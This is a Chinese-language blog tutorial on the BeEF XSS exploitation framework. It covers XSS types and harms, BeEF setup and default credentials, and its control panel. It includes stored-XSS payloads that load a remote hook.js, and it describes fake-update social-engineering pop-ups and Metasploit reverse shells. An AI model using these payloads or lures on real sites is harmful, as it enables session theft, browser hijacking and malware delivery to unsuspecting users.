淺談一下xss工具----beef

		今天主要聊一下,從認識xss的危害到beef-xss的利用	
		beef是一個類似與sql注入的sqlmap一樣,也是一種工具。

一、xss簡介

	定義:	跨站腳本攻擊。xss是一種在web應用中的計算機安全漏洞,
			它允許web用戶將一些惡意代碼植入到提供給其它用戶使用的頁面中
	種類:
			反射型xss:
					提交得數據成功的實現了xss,但是僅僅是對你這次訪問產生了影響,是非持久型攻擊
			存儲型xss:
					你提交的數據成功實現了xss,存入了數據庫,別人訪問這個頁面的時候就會自動觸發
			Dom型xss:
					經過一種編碼的xss,詳情:	https://t.cn/A6Apaxi8

二、認識xss的危害

	危害:
			盜取cookie(主要)
			獲取內網ip
			獲取瀏覽器保存的明文密碼
			截取網頁屏幕
			網頁上記錄鍵盤	
			。。。
			等等很多,這僅僅是常見的	

三、beef-xss簡介

	定義:
			一款瀏覽器攻擊框架,利用Ruby語言開發的,
			kali中默認安裝的一個模塊
			用於實現對xss漏洞的攻擊和利用
			
			簡單說,
					Beef-xss是對xss漏洞的最大化利用,
					直接獲取對方系統信息以及作爲社會工程學工具進行利用
			
			題外話,
					其實beef最經典的還是他的打開圖像(一個牛)

四、beef-xss使用

啓動步驟:												(kali環境中)
		第一:進入beef文件夾						cd /usr/share/beef-xss/					 
		
						補充:可以看看該文件夾都有什麼文件
							beef		---		主程序
							xxx.pem     ---		證書
							.yaml		---		配置文件
							db			---		數據庫
							modules		---		模塊
							extensions	---		利用工具
				
		第二:啓動beef										./beef									
		
						補充:第一次使用會提示修改默認密碼(beef)
						如何修改?
								cd /usr/share/beef-xss/
								leafpad config.yaml			//leafpad是一款編輯器
								
								此時應該以文本方式打開了該配置文件
								找到,		
											user:	"beef"
											passwd:	"beef"
								隨意修改爲自己想改的,保存,關閉
					
		第三:重啓beef										./beef
				
						最下邊會有一些網址,如:
						Hook URL:				http://127.0.0.1:3000/hook.js
						 UI URL:				http://127.0.0.1:3000/ui/panel
						
						第一個是鉤子----類似xss平臺的一些連接
						//不懂xss平臺的可以去百度一下,很多實戰教程估計
						
						第二個是beef的網頁登錄連接,直接複製,瀏覽器打開即可
						//簡單說,就是beef的後臺
						
			
網頁功能的一些介紹
		左上角的Hooked Browsers是受害者主機;
		下邊兩個選項,即上線的,沒上線的
		
		中間的Getting Started是一些說明,即說明手冊
		
		Logs是日誌	Zombies是監控
		
		
注意的一點,我們在打存儲型xss的時候,如留言框處,不要留言http://127.0----/hook.js
		而是這種:	
				<sCRiPt sRC=//127.0.0.1:3000/hook.js></sCrIpT>
				</tExtArEa>'"><sCRiPt sRC=http://127.0.0.1:3000/hook.js></sCrIpT>
					
				是不是很類似xss平臺的一些平臺?   其實本質原理都是一樣的		
				
				問:	爲什麼要在鉤子前加上<script>等等標籤?
				答:因爲要執行js語句,不然怎麼去加載執行你的惡意腳本
				

beef-控制檯介紹:
		~點擊受害者主機,選擇Commands選項(中間偏上的位置)
		~看到一些燈(紅的、白的、綠的、橙的)
		
				//其實是每個命令模塊都有一個交通燈圖標,用於指示以下內容
				
				綠色:命令模塊對目標起作用,對用戶應該是不可見的
				橙色:命令模塊對目標起作用,但可能對用戶可見
				白是:尚未針對此目標驗證命令模塊
				紅色:命令模塊不適用於此目標

		常用模塊:
				~瀏覽器(browser)
				~持續控制(Persistentce)
				~社會工程學(Social Engineering)
		
		多提一下這個社工模塊,
				可以讓瀏覽器彈窗顯示  “XXX”  可以更新了,
				管理員一點擊更新,就會下載一些咱們 讓他下載的東西
				
				這種模仿,幾乎可以以假亂真。所以,也多提一下
				工具的使用,一定要在有授權的情況下,大家心裏有個數
		
		
		根據這些功能可以產生非常大的危害,因爲本質上xss的危害就是操縱瀏覽器,瀏覽器可以一定程度上操縱計算機。
		而beef就是一個集成了xss危害的工具。除了上邊提到的一些偷cookie之外還可以乾的很多
		比如,讓受害者主機播放你想讓他播放的音樂、獲取網頁源碼、持續控制、社會工程學等等
		
		在多說一下,這個beef可以搭配msf使用,產生更大的危害,如反彈shell
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章